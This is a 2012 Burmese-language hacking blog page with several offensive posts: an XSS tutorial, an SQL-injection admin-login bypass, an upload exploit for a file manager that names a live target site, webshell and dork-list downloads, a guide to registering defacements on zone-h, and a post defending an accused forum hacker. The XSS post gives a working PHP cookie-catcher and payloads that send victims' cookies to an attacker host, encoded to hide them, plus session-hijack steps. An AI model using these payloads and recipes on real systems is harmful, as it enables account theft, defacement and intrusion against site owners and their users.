ကၽြန္ေတာ္ဆက္မေရးႏိုင္ေတာ့လို႕ ေတာ္ျပီလို႕ပဲေျပာခ်င္ပါတယ္.......။
ဒီစာကိုဖတ္တဲ့သူတိုင္း ႏံု၊အ ျခင္းမွာကင္းႏိုင္ၾကပါေစလို႕..........။
ဘီဂင္းနား Hacker ေလးေတြလည္းအေတြအၾကံဳရပါေစလို႕.......။

ဘာမွ်မတတ္ေသာ........။
shwekoyantaw
http://www.shweko.co.cc
http://shwekoyantaw.blogspot.com
Read More ->>

Saturday, April 21, 2012

Password is 123456 (ebook)


ပက္စ္၀ဘ္ေတြအေၾကာင္းပါ...ဘယ္လို crack ရမယ္ .ဘယ္လိုကာကြယ္ရမလဲ ဆိုတာေတြအျပင္.....
တျခားအေၾကာင္းအရာေလးေတြ အနည္းငယ္ပါ၀င္ ပါတယ္.ေအာက္ကလင့္ကေနေဒါင္းလိုက္ပါ....။
review ကို ေသခ်ာေရးေပးမေနေတာ့ပါဘူး......။

Download
မွတ္ခ်က္။   ။ password ကို rar ဖိုင္ထဲမွာတစ္ ခါတည္းထည့္ေပးထားတယ္။
Read More ->>

Friday, April 20, 2012

XSS Overview Part 2 : Types of Attacking Techniques



Types of Attacking Techniques
1.Cookies Stealing
2.XSS Phishing
3.XSS Defacement
4.XSS worm
5.Session Hijacking

1.Cookies Stealing

ပထမဆံုး Cookies Stealing လုပ္ဖို႕အဓိကလိုအပ္ေသာ Cookies Catcher အေၾကာင္း အနည္းငယ္ေျပာပါမယ္ ေနာက္ပို႕စ္မွာ Cookies Catcher အေၾကာင္း အေသးစိတ္ေရးေပးပါ့မယ္ Cookies Catcher ဆိုတာ Cookies Stealing လုပ္ရန္ စီစဥ္ထားေသာ php file ျဖစ္ျပီး ယင္း php file မွ catch လုပ္၍ရေသာ Cookies မ်ားကို .txt file ကဲ့ေသာ ေနရာတြင္ Cookies Stole လုပ္ထားမည္ျဖစ္ပါသည္ :-) ေအာက္မွာ နမူနာ Cookies Catcher ပါ
 Code
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);;
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Website: '.$referer.'
');
fclose($fp);
header (\"javascript:history.back()\");
?

ဒီဖိုင္ကို .php န႕ဲသိမ္းျပီး PHP Script လက္ခံေသာ Hosting တစ္ခုတြင္ တင္ထားႏိုင္သည္ ဥပမာ www.my3gb.com/cookiescatcher.php ေပါ့ Cookies Catcher မွ သိမ္းဆည္းရရွိေသာ Cookies မ်ားကိုေတာ့ cookies.html ဆိုတဲ့ ဖုိင္မွာသြားၾကည့္ႏုိင္ပါတယ္ ;-)

 Persistent Cookies Stealing

ပထမဆံုး Vulnerabilities ရွာပါ့မယ္ www.target.com/feedback ေပါ့ Input လုပ္ခြင့္ရွိေသာ Comment Box လိုေနရာမ်ိဳးမွာ
<script>alert(“XSS”)</script>
အကယ္၍မ်ား Alert Box တက္လာလွ်င္ Vulnerabilities ျဖစ္ပါျပီ ဒါေၾကာင့္ Code Inject လုပ္ခြင့္ရွိပါျပီ ေရွ႕မွာေျပာခဲ့ဖူးပါတယ္ Persistent XSS မွာ Inject လုပ္တဲ့ Code ေတြကို Web Server ထဲမွာသြားေရာက္သိမ္းဆည္းထားပါတယ္ ဒါေၾကာင့္
<script>document.location="www.hacker.com/cookie catcher.php?c=" + document.cookie</script>
ဆိုျပီး Code Inject လုပ္ျပီး Submit လုပ္လိုက္ပါ့မယ္ cookie catcher.php ဆိုတဲ့ ဖုိင္ကိုသြားခ်ိတ္ထားတာပါ အကယ္၍ အျခား User က www.target.com/feedback ဆိုတဲ့ Page ကို၀င္တာနဲ႕ ခုနက Code ဟာ အလုပ္လုပ္ျပီး User ရဲ႕ Cookies ကို cookie catcher က သိမ္းယူျပီးေတာ့ Page တစ္ခုခုကို ျပန္ ပို႕ေပးလိုက္ပါတယ္ ( ဥပမာ index လိုေနရာမ်ိဳး သို႕မဟုတ္ ေနာက္ဆံုးေရာက္ရွိေသာ Page လိုေနရာမ်ိဳးကိုေပါ့ )  :-) ဒါဆုိ User ရဲ႕ Cookies ကိုရရွိျပီး Access လုပ္ႏိုင္ပါျပီ  :-P အျခားေသာ နည္းတစ္နည္းလည္းရွိပါေသးတယ္ iframe tag ကိုသံုးျပီး Inject လုပ္မယ္ဆုိရင္လည္း ျဖစ္ႏုိင္ပါတယ္ ခုနကလို Feedback Page မွာ
 <iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="www.hacker.com/cookie catcher.php?c=" + document.cookie)</iframe>
ဒီလိုတင္ေပးျပီး အျခား User စိတ္၀င္စားမယ့္ ေခါင္းစဥ္တစ္ခုခုနဲ႕တင္လုိက္လို႕ User တစ္ေယာက္၀င္တာနဲ႕ အဲ့ဒီ့ User ရဲ႕ Cookies ကို Cookies Catcher က သိမ္းဆည္းသြားမွာျဖစ္ပါတယ္  ;-)

Non-persistent Cookies Stealing Attack

ပထမဆံုး Vuln ျဖစ္မျဖစ္စမ္းပါ့မယ္ ( www.site.com ) Search Box မွာ
<script>alert(“XSS”)</script>
လို႕ Input လုပ္ပါ့မယ္ ( ဒီလိုဆို၇င္ Browser Link မွာ www.site.com/search?q=<script>alert(“XSS”)</script> ဆိုျပီး Request လုပ္တာေတြ႕ရမွာပါ တကယ္လို႕ hacker လို႕ Search Box မွာရွာရင္လည္း www.site.com/search?q=hacker ဆိုျပီး Request လုပ္မွာပါပဲ )
ဒါဆို Cookies Steal လုပ္ဖို႕စီစဥ္ရပါ့မယ္ ( ဒီ Non-persistent မွာ Script ကို Store လုပ္ထားမွာမဟုတ္တဲ့အတြက္ Cookies Catcher Link ကုိ User ႏွိပ္ေအာင္ျမဴဆြယ္ရပါ့မယ္ )
<script>document.location="www.hacker.com/cookie catcher.php?c=" + document.cookie</script>
ဒီလို Inject လုပ္ပါ့မယ္ ဒါဆုိ www.site.com/search?q=<script>document.location="www.hacker.com/cookie catcher.php?c=" + document.cookie</script> ဆိုျပီး Inject လုပ္ပါ့မယ္ တကယ္လို႕ မည္သည့္ User မဆို အဲ့ဒီ့ လင့္ခ္ကို Request လုပ္တာနဲ႕ cookies Catcher က Cookies သိမ္းယူမွာျဖစ္ပါတယ္ သို႕ေသာ္လည္း ဒီလိုၾကီး တင္ျပီး Request လုပ္ဖို႕ ျမဴဆြယ္ရင္ မည္သည့္ User မဆို သံသယျဖစ္မွာပါ ဒါေၾကာင့္ ေနာက္က script ကို ဖြက္ရပါမယ္ ဒီလိုဖြက္ဖို႕အတြက္ script code ကို Url ကို encode လုပ္ရပါ့မယ္ ပထမဆံုး www.hacker.com/cookie catcher.php?c= ကို Javascript string.from Charcode ေျပာင္းပါ့မယ္ ဒါဆုိ
119, 119, 119, 46, 104, 97, 99, 107, 101, 114, 46, 99, 111, 109, 47, 99, 111, 111, 107, 105, 101, 32, 99, 97, 116, 99, 104, 101, 114, 46, 112, 104, 112, 63, 99, 61
လိုရပါ့မယ္ ဒါဆုိရင္
www.site.com/search?q=<script>document.location=”119, 119, 119, 46, 104, 97, 99, 107, 101, 114, 46, 99, 111, 109, 47, 99, 111, 111, 107, 105, 101, 32, 99, 97, 116, 99, 104, 101, 114, 46, 112, 104, 112, 63, 99, 61″ + document.cookie</script>
ဒီလုိျဖစ္သြားပါ့မယ္ ထပ္ျပီး script ကို ascii to hex ေျပာငး္ပါ့မယ္ ( <script>document.location=”119, 119, 119, 46, 104, 97, 99, 107, 101, 114, 46, 99, 111, 109, 47, 99, 111, 111, 107, 105, 101, 32, 99, 97, 116, 99, 104, 101, 114, 46, 112, 104, 112, 63, 99, 61″ + document.cookie</script ) ကိုေပါ့ေနာ္
ဒါဆုိ
www.site.com/search?q=%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%22%31%31%39%2c%20%31%31%39%2c%20%31%31%39%2c%20%34%36%2c%20%31%30%34%2c%20%39%37%2c%20%39%39%2c%20%31%30%37%2c%20%31%30%31%2c%20%31%31%34%2c%20%34%36%2c%20%39%39%2c%20%31%31%31%2c%20%31%30%39%2c%20%34%37%2c%20%39%39%2c%20%31%31%31%2c%20%31%31%31%2c%20%31%30%37%2c%20%31%30%35%2c%20%31%30%31%2c%20%33%32%2c%20%39%39%2c%20%39%37%2c%20%31%31%36%2c%20%39%39%2c%20%31%30%34%2c%20%31%30%31%2c%20%31%31%34%2c%20%34%36%2c%20%31%31%32%2c%20%31%30%34%2c%20%31%31%32%2c%20%36%33%2c%20%39%39%2c%20%36%31%22%20%2b%20%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
လိုျဖစ္သြားျပီး User က ဘာလင့္ခ္မွန္းမသိဘဲ Request လုပ္တာနဲ႕ Cookies Catcher က သိမ္းယူသြားပါျပိ

2.XSS Phishing

          XSS Phishing မွာေတာ့ Persistent Method မွာေပါက္တဲ့ Link မွာ <script>window.location="http://hacker.com/phishing.html";</script> လို႕ရိုက္သြင္းလိုက္တာနဲ႕ အဲ့ဒီ့လင့္ခ္ကိုသြားရင္ Phishing Page တက္လာမွာျဖစ္ပါတယ္ N0n-Persistant Attack မွာလည္း ယင္း Script နဲ႕ပဲ Url Encode လုပ္ျပီး Attack လုပ္ႏုိင္ပါတယ္ ;-)

3.XSS Defacement

            ဒါကလည္း ခုနက နဲ႕သိပ္မထူးပါဘူး Persistant မွာ 
<script>window.location="*http://yourdefacepage.com/index.html";</script> လို႕ Inject လုပ္ျပီး 
Non-Persistant မွာေတာ့ Link Encode လုပ္ျပီး Deface လုပ္ႏိုင္ပါတယ္ 
တျခားနည္းတနည္းလည္းရွိပါတယ္ အဲ့ဒီ့နည္းကေတာ့ 
<script>document.body.bgColor="black";</script> ဆိုတဲ့ Script နဲ႕ Website ရဲ႕ Background Colour ကို ခ်ိန္ုးျပီးေတာ့ <script>document.body.background="http://hacker.com/hacked.jpg";</script> ဆိုျပီး Image တင္လို္က္တာပါပဲ ;-)

4.XSS Worm

           Advanced Technique ျဖစ္ျပီး အခ်ိန္ယူေလ့လာရမွာျဖစ္ပါတယ္ ဒီ မွာေတာ့ အနည္းအက်ဥ္းပဲေရးႏုိင္လိုက္ပါတယ္ ေနာက္ေတာ့ ဒီ့ထက္ပိုျပီး ေရးႏုိင္ေအာင္ၾကိဳးစားေနပါတယ္ :-D
XSS Worm ဟာ XSS Vulnerabilities ေတြထဲမွာ အဆိုး၀ါးဆံုးနဲ႕အထိခုိက္ဆံုး တိုက္ခိုက္မႈျဖစ္ပါတယ္ worm ေတြအျပင္ Trojan ေတြ Bot ေတြပါ ကူးစက္လာႏုိင္ေစပါတယ္ :-( ကြၽန္ေတာ္တုိ႕ Internet သံုးခ်ိန္ေတြမွာ Browser ေတြဟာ script ေတြကို Download လုပ္ေနပါတယ္ ယင္း script မ်ားမွ တစ္ဆင့္ Javascript Worm မ်ားကူးစက္လာႏုိင္ေစပါတယ္ XSS ေပါက္ေနတဲ့ဆိုဒ္တစ္ခုကေန File တစ္ခုုခုကို Download ခ်ခိုင္းလို႕ ခ်လိုက္ရင္လည္း Trojan ေတြ Bot ေတြကူးစက္လာႏုိင္ပါတယ္ :-P

5.Session Hijacking

           ;-) ကဲ ကၽြန္ေတာ္တို႕မွာ cookies ေတြရျပီဆိုပါစို႕ ဒါဆုိ အဲ့ဒီ့ cookies ေတြကို access လုပ္ရပါမယ္ ဒီေတာ့ ကၽြန္ေတာ္တုိ႕ Browser ေတြကို အရင္ဆံုး Cookies ေတြအကုန္ရွင္းပစ္ရပါ့မယ္ ျပီးရင္ cookies.html ကိုသြားျပီး အကုန္ Copy ကူးခဲ့ပါ့မယ္ 
ျပီးရင္ Vul ျဖစ္ေနတဲ့ဆုိဒ္ကိုသြားျပီး
Javascript:void(document.cookie="") ဆိုျပီး access လုပ္ႏုိင္ပါျပီ
ဥပမာ
Javascript:void(document.cookie="__utma=255621336.1130089386.1295743598.1305934653.1305950205.86")
အဲ့ဒီလို Request လုပ္လိုက္တာနဲ႕ Cookies ကုိ Catach လုပ္ခံထားရတဲ့ user ရဲ႕ Panel ထဲေရာက္သြားပါျပီ အကယ္၍မ်ား admin account သာရလိုက္ရင္ .. :-D
Ref : SirGod : Web Application Attacks
XSS attack Ebook

Hack Community

အခုဟာကေတာ့ က်ယ္ျပန္႕လွေသာ XSS မွာ အတိုခ်ံဳးျပီးေရးေပးထားတာပါ ေနာက္ပိုင္းမွာ XSS ကာကြယ္နည္းေတြ အပါအ၀င္ ယင္း filter မ်ားကို ေက်ာ္ခြနည္းေတြပါ ေရးေပးပါ့မယ္ ေက်းဇူးတင္ပါတယ္ 
XSS Tutotial အစအဆံုးကို PDF နဲ႕ေဒါင္းခ်င္ရင္ Click here to Download

source by ghost area .net
Read More ->>

Thursday, April 19, 2012

အားေပးေထာက္ခံေပးျခင္း


အထက္ပါပံုအတိုင္းျမန္မာအိုင္တီနန္းေတာ္ မွကၽြန္ေတာ့္သူငယ္ခ်င္း little.blackr00ter (http://www.d3l3t3r-idl0t.co.cc/ မွ)
အားေစာ္ကားျပီး စြတ္ဆဲြ ေျပာဆိုခဲ့ျခင္းအား   ကၽြန္ေတာ့္သူငယ္ခ်င္း little.blackr00ter ဘက္မွ အခ်ိန္ျပည့္
အားေပးေထာက္ခံေနမည္ျဖစ္ပါေၾကာင္း ဦးစြာပထမ ေျပာဆိုလိုပါတယ္......။ ေအာက္ပါစာသားမ်ား
သည္ကၽြန္ေတာ့္သူငယ္ခ်င္၏...http://www.d3l3t3r-idl0t.co.cc/2012/04/blog-post_10.html တြင္ေဖၚျပထားေသာစာသားမ်ားျဖစ္ပါသည္........။

""" ျမန္မာအိုင္တီနန္းေတာ္တြင္းမန္ဘာမ်ားအားလံုးကို ေတာင္းပန္ပါတယ္ခင္ဗ်ာ ၃ရက္ေန႕ ျမန္မာအခ်ိန္ ၉နာရီခြဲေလာက္မွာ အိုင္တီနန္းေတာ္ အေမႊခံလိုက္ရပါတယ္ ၀င္ဟက္တယ္ပဲေျပာရမလား ကၽြန္ေတာ္ကေတာ့ ခုလိုျဖစ္တာကို ဟက္တယ္လို့မေခၚခ်င္ဘူး ဘာလို့လည္းဆိုေတာ့လုပ္သြားတဲ့အရာေတြက အရမ္းမိုက္ရုိင္းလြန္းတယ္ ကၽြန္ေတာ္တို့ အသိျမန္ခဲ့လို့ကံေကာင္းတယ္ေျပာရမယ္ အဲ့ဒီခ်ိန္မွာအသစ္၀င္လာတဲ့ မန္ဘာသစ္ေတြအားလံုးကို ေတာင္းပန္ပါတယ္ခင္ဗ်ာ ကၽြန္ေတာ္တို့ေပါ့ေလ်ာ့မွဳေၾကာင့္ျဖစ္သြားရတာပါ ဟက္တဲ့လူက ဘာေတြလုပ္ခဲ့လည္းဆိုေတာ့ profile question ေတြမွာ မိုက္၂ရုိင္း၂ေတြေရးသြားတယ္ ၀င္လာတဲ့မန္ဘာအသစ္ေတြ ျမင္ေတြ႔ရမွာပါ ေနာက္ျပီး photo နဲ့ movies ေတြမွာလည္း sex နဲ့ပက္သက္တာေတြ၀င္တင္သြားတယ္ တဆိုဒ္လံုးဟက္သြားပါေစ အဲ့ေလာက္ေဒါသမျဖစ္မိဘူးကၽြန္ေတာ္ ခုလိုလုပ္သြားတာက ေတာ္၂မိုက္ရုိင္းပါတယ္
xxxxx Hacked by little black root xxxxx---- [ouch! now at -2]
little.blackr00ter@googlemail.com ဒီစာခ်န္သြားခဲ့တယ္ ဆိုဒ္မွာhttp://www.d3l3t3r-idl0t.co.cc/ ဟက္သြားတဲ့လူဆိုဒ္လင့္ နည္းပညာေတြပို့ခ်ျပီး ဒီလိုစိတ္ဓာတ္မ်ိဳးရွိတာေတာ့အံၾသပါတယ္ 
မည္သို႕မည္ပံုဟက္သြားပါသလည္း
သူလည္းအရင္က အိုင္တီနန္းေတာ္ ကနန္းေတာ္ထိန္းပါ ဆိုဒ္ထဲက မန္ဘာတေယာက္ကို ခ်က္ထဲမွာ ၀င္ဆဲလို့ကၽြန္ေတာ္ ရုိးခ်လိုက္တာပါအဲ့ေန႕ကပဲသူထြက္သြားခဲ့တယ္ ျဖစ္ပံုကဒီလို မန္ဘာထဲက ၀တ္မွဳန္ဆိုတဲ့ ေကာင္မေလးကို ၾကဴက်တယ္ဗ်ာ အဲ့ဒီကေနျပသနာတက္ေတာ့ခ်က္ထဲလာရွင္း အဲ့မွာblack rotter ကအဲ့မန္ဘာကို၀င္ဆဲေတာ့ က်န္တဲ့အက္မင္ေတြကသူ့ကို ရိဳးခ်ျပီးဘမ္းရတာေပါ့ အဲ့ဒါကိုသူက မွတ္ထားတယ္နဲ့တူတယ္ ခု၀င္ဟက္သြားတာလည္း ၀တ္မွုန္ဆိုတဲ့ေကာင္မေလးအေကာင့္နဲ႕ အဲ့ေကာင္မေလးကို ဘယ္အက္မင္က ကၽြန္ေတာ္မသိပဲ အက္မင္တင္လိုက္လည္းမသိဘူး အဲ့အေကာင့္ကေနပဲ၀င္ဟက္သြားတာ ဟက္ပါတဆိုဒ္လံုး ပညာနဲ့ဟက္သြားေလးစားပါတယ္ ခုလုပ္ပံုက  photo မွာ sex photo ေတြတင္ profile question ေတြမွာ လူမဆန္တဲ့ စာေတြေရး သြားတာေတာ့မိုက္ရုိင္းပါတယ္ 
ခုကၽြန္ေတာ္တို့ ျပန္ဖ်က္ထားလိုက္ပါျပီ မန္ဘာေတြအားလံုးလည္း ေက်းဇူးျပဳျပီး မိမိ ပရုိဖိုင္ေတြကိုျပန္စစ္ ျပီးျပင္ဆင္ေပးက်ပါလို႕
xxxxx Hacked by little black root xxxxx---- [ouch! now at -2]
little.blackr00ter@googlemail.com ဒီစာခ်န္သြားခဲ့တယ္ ဆိုဒ္မွာhttp://www.d3l3t3r-idl0t.co.cc/
ဒီစာေလးေတာ့ ထားခဲ့တယ္ဗ် သူလုပ္တာၾကြားခဲ့တာထင္ပါရဲ့ ၅မိနစ္ေလာက္ေတာ့ၾကာတယ္ဗ် သူဟက္တာျပန္ျပင္လိုက္ရတာေလ   """

 လို႕ေျပာထားတာပါ။
ကၽြန္ေတာ္ဆိုဒ္တိုင္းမွာ တင္ထားပါတယ္ အျဖစ္မွန္ကိုေပၚလာေစဖို႕လဲစုေတာင္းပါတယ္။
ကၽြန္ေတာ့္ကို ျမန္မာအိုင္တီနန္းေတာ္ မွာ မဟုတ္ဘဲနဲ႕ သက္ေသအေထာင္အထားမရွိဘဲ နဲ႕စြတ္စြဲခဲ့ပါတယ္ ဒါေပမယ္ ့ ကၽြန္ေတာ္ ဘာမွမလုပ္ေတာ့ပါဘူး လူတိုင္းကေတာ့ ထင္ပါလိမ့္မယ္ ကၽြန္ေတာ္ တင္တယ္လို႕ပဲေပါ့ဗ်ာ။ ဒါေပမယ့္ ကၽြန္ေတာ့္ကို ယုံတဲ့လူေတြလဲရွိပါတယ္ ကၽြန္ေတာ့္မွာရပ္တည္ေပးခဲ့တဲ့ လူေတြလဲရွိပါတယ္။ ကၽြန္ေတာ္ကုိယုံၾကည္ေပးတဲ့လူေတြကိုလဲေက်းဇူးတင္ပါတယ္ ကၽြန္ေတာ့္ကို ေျဖသိမ့္ေပးခဲ့တဲ့ အကိုမ်ားညီအမမ်ား MHU မွညီအကိုမ်ား CHG မွညီအကိုမ်ားကို လဲအထူးပင္ေက်းဇူးတင္ပါတယ္ ။ ကၽြန္ေတာ့္ကို စြပ္စြဲတဲ့လူေတြ ...........။ ကၽြန္ေတာ့္ကို အြန္လိုင္းမွာစြပ္ဆြဲတာပါ အျပင္မွာ စြပ္ဆြဲခဲ့ရင္ေတာ့ ေနာင္ဘ၀မွာ လူျပန္ျဖစ္ေတာင္ ျမင့္ျမတ္တဲ့ ေယာက်္ားတစ္ေယာက္ျဖစ္ပါေစလို႕ ကၽြန္ေတာ္ စုေတာင္းေပးပါတယ္။ ကၽြန္ေတာ္ မလုပ္ဘူးဆိုတာ ကၽြန္ေတာ့္ကိုလူေတြနဲ႕ ကၽြန္ေတာ့္ ကိုယ္ေစာင့္နတ္ဘုရား ေတြလဲသိပါတယ္ ကၽြန္ေတာ္ကေတာ့လုံပါတယ္။ ေနာက္ေတာ့ ဧျပီ သုံးရက္ေန႕ကိုဘယ္ေတာ့မွလဲ ေမ့ႏိုင္မည္မဟုတ္ပါဘူး။ အျဖစ္မွန္ကိုလဲ ေနျပည္ေတာ္မွ ကၽြန္ေတာ့္သူငယ္ခ်င္းမ်ားႏွင့္ ေနျပည္ေတာ္မွ ကၽြန္ေတာ္မိတ္ေဆြအသိမ်ားလဲသိပါတယ္ ေနျပည္ေတာ္မွာ စြပ္ဆြဲခံရတဲ့ေန႕ စြပ္ဆြဲခံရတဲ့အခ်ိန္မီးပ်က္ေနပါတယ္ အားလုံးကိုေလးစားလွ်က္မွ ......

ကၽြန္ေတာ္ေတာ္ရံုဆိုရင္ သိပ္ျပီးၾကားမ၀င္တတ္ပါဘူး ဒါေပမယ့္ခုဟာကေတာ္ေတာ္ လြန္ပါတယ္...။လူတစ္
ေယာက္ရဲ႕ သိကၡာကို ေစာ္ကားလိုက္တာပါ......။ကၽြန္ေတာ္ကေတာ့ ကၽြန္ေတာ့္ေဘာ္ဒါဘက္က ေထာက္ခံ
အားေပးေနမည္ျဖစ္ပါေၾကာင္းႏွင့္ ကၽြန္ေတာ့္ေဘာ္ဒါကို အျမဲအားေပး ေနမည္ျဖစ္ပါေၾကာင္းကို လူအမ်ား
သိေစရန္ တရား၀င္ ေၾကညာအပ္ပါသည္။.....ဒီပိုစ့္ႏွင့္ပတ္သက္ျပီး အရႈပ္အရွင္းမ်ားကို  ကၽြန္ေတာ္ တစ္
ေယာက္တည္းတာ၀န္ ယူမည္ျဖစ္ျပီး...တျခားမည္သူတစ္ဦးတစ္ေယာက္ ႏွင့္မွ်မဆိုင္ပါေၾကာင္းႏွင့္ မေၾကႏွပ္သူမည္သူမဆို ထိပ္တိုက္ ေျဖရွင္းႏိုင္ ေၾကာင္းႏွင့္ မည္သူ႕ကိုမွွ် ဂရုစိုက္ေနမည္မဟုတ္ပါေၾကာင္း။

ကၽြန္ေတာ့္ေဘာ္ဒါအား အားေပးေနလွ်က္.....။

shwekoyantaw 
Read More ->>

Wednesday, April 18, 2012

Shell collections (download)


ကၽြန္ေတာ္သိသေလာက္ျပန္စုထားတာ ...ကၽြန္ေတာ္မအားလို႕ virus scan လုပ္မေပးႏိုင္ဘူး ကိုယ္ဘာသာ လုပ္ယူၾကေပေတာ့ ....ဒီထဲမွာကၽြန္ေတာ္သိသေလာက္ shell (၂၀) ထည့္ေပးထားတယ္.....။
ေအာက္ကလင့္ကေနေဒါင္းလိုက္ၾကပါ.......။


Download

ေအာက္ပါေနရာကလဲရႏိုင္သည္....။
http://sh3ll.org/
Read More ->>

HOW TO HACK WEBSITES ADMIN PANEL



1. search google for adminlogin.asp
2.click on any link
3.in the username field type admin
4. in the password field type 'or''='

UR DONE........
:-)
Enjory.../
post by aung Latt
Read More ->>

How to use m1rr0r:::::,..



mirror ဆိုတာ ဘာပါလဲ...mirror ဆိုတာ defacer မ်ားအတြက္ အေကာင္းဆံုး မိမိဒီ website ကို deface အုပ္ခဲ႔ေၾကာင္းျပဖို႔ အေကာင္းဆံုးသက္ေသ ပါ...မိမိတို႔ရဲ႔ deface link ကို screenshot ေလးရိုက္ျပထားရံုနဲ႔ မလံုေလာက္ပါဘူး...
ျမန္မာမွာ mirror သံုးတာ bro Dongoth နဲ႔ blackvenom တို႔ကိုပဲ ပထမဆံုးျမင္ဖူးပါတယ္......ျမန္မာျပည္ရဲ႔ mirror ဖခင္ၾကီးေတြေပါ႔ဗ်ာ... :mrgreen:
Internet မွာလည္း mirror service site ေတြ ဆယ္ဂဏန္းေလာက္ ရွိပါတယ္...ကၽြန္ေတာ္ကေတာ႔ www.zone-h.org ကိုညြန္းပါမယ္...

လြယ္ပါတယ္....www.zone-h.org မွာ register လုပ္ပါ...ျပီးသြားရင္ login ၀င္ပါ...အေပၚဖက္ menu ေတြထဲက Notify မွာ မိမိတို႔ရဲ႔ deface link ကို submit သြားလုပ္ရပါမယ္... submit လုပ္ျပီးသြားရင္ေတာ႔ onhold မွာ mirror link ကိုသြားၾကည္႔ႏိူင္ပါျပီ....ေအာက္ကပံုေလးေတြကိုၾကည္႔ပါ....
အခုကၽြန္ေတာ္႔ demo အေနနဲ႔႔
http://iddp.is
ကို zone-h မွာ submit လုပ္လိုက္ပါမယ္...





ျပီးရင္ onhold မွာ ျပန္သြားၾကည္႔ႏိူင္ပါျပီ...ျပီးရင္ ကိုယ္ ဒီ site ကို hack ခဲ႔တာ ဆိုျပီး မယံုတဲ႔သူေတြကိုျပဖို႔ သက္ေသရပါျပီဗ်ာ...

ဒါက demo အတြက္ mirror link ေပါ႔ဗ်ာ....
http://www.zone-h.org/mirror/id/17450219

Enjoy! ;)

post by hacker 1989source By MHF
Read More ->>

Tuesday, April 17, 2012

EzFilemanager Deface Upload vulnerability


Google Dork inurl:ezfilemanager/ezfilemanager.php


Exploit : http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file

Go to this url : website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php
and 
put ?sa=1&type=file after URL
now url will be :  http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file

ကြ်န္ေတာ္တို ့ေတြအဲ့မွာ  ,html ,pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files ေတြ upload တင္နုိင္မွာျဖစ္ပါတယ္...
ကြ်န္ေတာ္ကေတာ့ txt ဖုိင္ေလးဘဲတင္ျပထားတယ္..

http://www.hollywood-arts.org/tinymce/jscripts/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=image






အဲ့မွာ ကြ်န္ေတာ္ အနီနဲ ့၀ုိက္ ျပထားပါတယ္.. အဲ့ဖုိင္ေတြကို ဆုိဒ္မွာ တင္ခြင့္၇ွိမွာျဖစ္ပါတယ္...
ပုံနည္းနည္းေသးသြားတယ္ဗ်ာ.. ctrl ခလုတ္ကို ဖိျပီး mouse ဘီး ေလးနဲ ့အတုိးအခ်ဲ ့လုပ္ၾကည့္လုိက္ပါ...
အဲ့မွာတင္ျပီးသြားရင္ေတာ့  browse တည္းျပန္သြားလုိက္ပါ.. သင့္ဖုိင္ေလး ေရာက္ေနတာေတြ ့ပါလိမ့္မယ္...


ကဲအဲ့ဖုိင္ေလး ကို ကလစ္နုိပ္လုိက္မယ္ဆုိရင္ေတာ့ သင္ တင္ထားတဲ့ဖုိင္ကို ျမင္ရမွာျဖစ္ပါတယ္..
ကဲ သြားၾကည့္လုိက္ပါ.. ကြ်န္ေတာ္တင္ထားတာေလး

http://www.hollywood-arts.org/ez-images/chg.jpg

source By http://cyberhackergroup.multiply.com/journal/item/44
Read More ->>

XCode SQL Injection/LFI/XSS Vulnurable & Webshell Scanner



USAGE:
Once downloaded, extract all the files and run XCodeXploitScanner.exe, insert your dork, Click Dork It and it will collect links from Dork you enter and displays the list. after displaying List, you will be able to conduct SQL injection vulnerability scanning / Local File Inclusion / Cross Site Scripting on the web that is in the list. This tool will send the injection parameters to the web as’ – * /../../../../../../../../../../../../. . / .. / etc / passwd% 00 “> alert (” XSS Xcode Exploit Scanner detected “). If the Web has a bug then the status will appear: www.target.com?blabla.php?=1234: SQLi Vulnerable.
www.target.com?blabla.php?=1234/../../../../../../../../../../../../. . / .. / etc / passwd% 00 LFI Vulnerable
www.target.com?blabla.php?=1234 “> alert (” XXS Xcode Exploit Scanner Detected “) XSS Vulnerable
At the status list is detected, you can click Open Vuln Link with Browser to display on your browser
This tool also adds webshell hunter, where you can search the web shell C99, R57, C100, ITsecteam_shell, b374k, which had been uploaded by the hackers.
Perhaps there are many shortcomings or bugs are not known by the author. But at least this tool you can make it easier to find targets.
================================================================
Credits:
Code name : .::XCode Exploit – Vulnurable & webshell Scanner::.
Description : – SQLI/LFI/XSS/Webshell Hunter with Google Engine -
Compiler : Microsoft Visual Basic 6.0
Author : poni
System : Windows 95, 98, XP, Vista, 7
Size : 1,38 mb
Update : I`m not sure where will i put it. Just
check the sites below
http://www.xcode.or.id
http://ferdianelli.wordpress.com
================================================================
Info :
XCode Exploit – Vulnurable & webshell Scanner help you to
gather the dorks Link from Google. then you may check the
results if its Vulnurable to exploit with SQL injection commands
, LFI,and XSS. And You may hunt the webshells those uploaded.
=================================================================

Download
Read More ->>

SQL Dork Lists (Download)

Dork ေတြ စုတင္ေပးထားတာ...သံုးရင္လဲ မ်ားမ်ားသံုးရေအာင္လို႕ ေပါ့ေနာ္.....။မ်က္စိလည္းေနာက္ ေအာင္လို႕ေပါ့ေနာ္ .......။သူမ်ားမေျပာနဲ႕ ကိုယ္ ဘာသာကိုယ္ေတာင္ BE သံုးလံုးစာေလာက္ကိုမူးသြာတာ.......အဲဒီေလာက္ကိုမ်ားတာ...။ဘာေတြမွန္း ကို မသိေတာ့ေအာင္မ်ားတာ.......။
ကၽြန္ေတာ့္လိုမ်က္စိေနာက္တာခံႏိုင္ရင္ ေအာက္ကလင့္ကေနေဒါင္းသြားလိုက္ၾကပါ......။

Download
Read More ->>

XSS?? What is XSS??



